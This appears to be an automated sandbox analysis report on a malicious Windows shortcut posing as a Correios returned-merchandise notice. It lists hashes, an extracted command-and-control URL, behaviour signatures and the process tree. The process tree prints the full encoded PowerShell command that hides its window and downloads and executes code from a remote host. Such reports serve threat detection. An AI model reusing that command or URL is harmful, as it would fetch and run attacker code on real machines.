Analysis
-
max time kernel
51s -
max time network
51s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
13-06-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-H0C42E2H.lnk
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-H0C42E2H.lnk
Resource
win10v2004-20240508-en
General
-
Target
Mercadoria_Devolvida-Correios-H0C42E2H.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4268 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4392 wrote to memory of 4268 4392 cmd.exe 84 PID 4392 wrote to memory of 4268 4392 cmd.exe 84 PID 4268 wrote to memory of 2812 4268 powershell.exe 85 PID 4268 wrote to memory of 2812 4268 powershell.exe 85 PID 2812 wrote to memory of 4928 2812 csc.exe 86 PID 2812 wrote to memory of 4928 2812 csc.exe 86
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"4⤵PID:4928
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD50c39411b5d7354d62bc468e1ecc003cf
SHA1f303e17b70669aafd6a78621c683cbbc0e9d68b3
SHA256d79a3d27b16155dc85d3ee3119a11db06077c704acfae526f9bfe1cb5e1fb6bb
SHA51200c71134e54b4b256b7de7de91b40a6af2261244ede10b808e95011a96f37f9982c0fe51d79b134574d01b088236456008caa6418037d41d45bf2e9ed3ed8641
-
Filesize
1KB
MD5d86f725d547cb238fc0e460a6ec552f5
SHA12928afba43f00889d5e35240c7efb3d94c6e1918
SHA25696323c77c7ab3ce4ded15543adf859c75dc903c3acddc8cdd9c7b5d11e847f81
SHA512a3c5251303214d05e6c20a74ce13c1ea4eb357e64484b3cdd4214a496b6b20649a04bfcf8421da8e00622cff6cf4fb38bf20550ce7293c0cfae0c8bcc7ed6017
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
369B
MD5c7c971702ae33f87a3c605e7f9a8e3c2
SHA1514d554d797228435d6a0751801826f058c0ed29
SHA256aa232abe9b41ebdeff838a369cc012a1a1c46b870a321e7ac2a0f5f29a1d6a4e
SHA512c14de704b6ea142b29899cfd8471a0d7d31419ac672228a2e96e39f093a3ba3f5f73e01e9a1e5c10ba13b6a275e36c6ab8ce950d20859fd106d229685f656b39
-
Filesize
652B
MD532f206c989422b3df2f6225c9ac5f9be
SHA1748aef167a738192b6ef21c964c30d9b169d2e4d
SHA2565c3bb3f60b056476c2be7e746625fbddc7edd8cf6630dc873895511ad3964e0c
SHA512edb9f7af5c9ed9e3ddfc6e32c407fa01fd09c54e5eee8f102c4dcff53c5631650c9d131f9e96ccb6447ce9f8d4979f7a6fb0ff9fb1e32b66130c58a85b2e2c02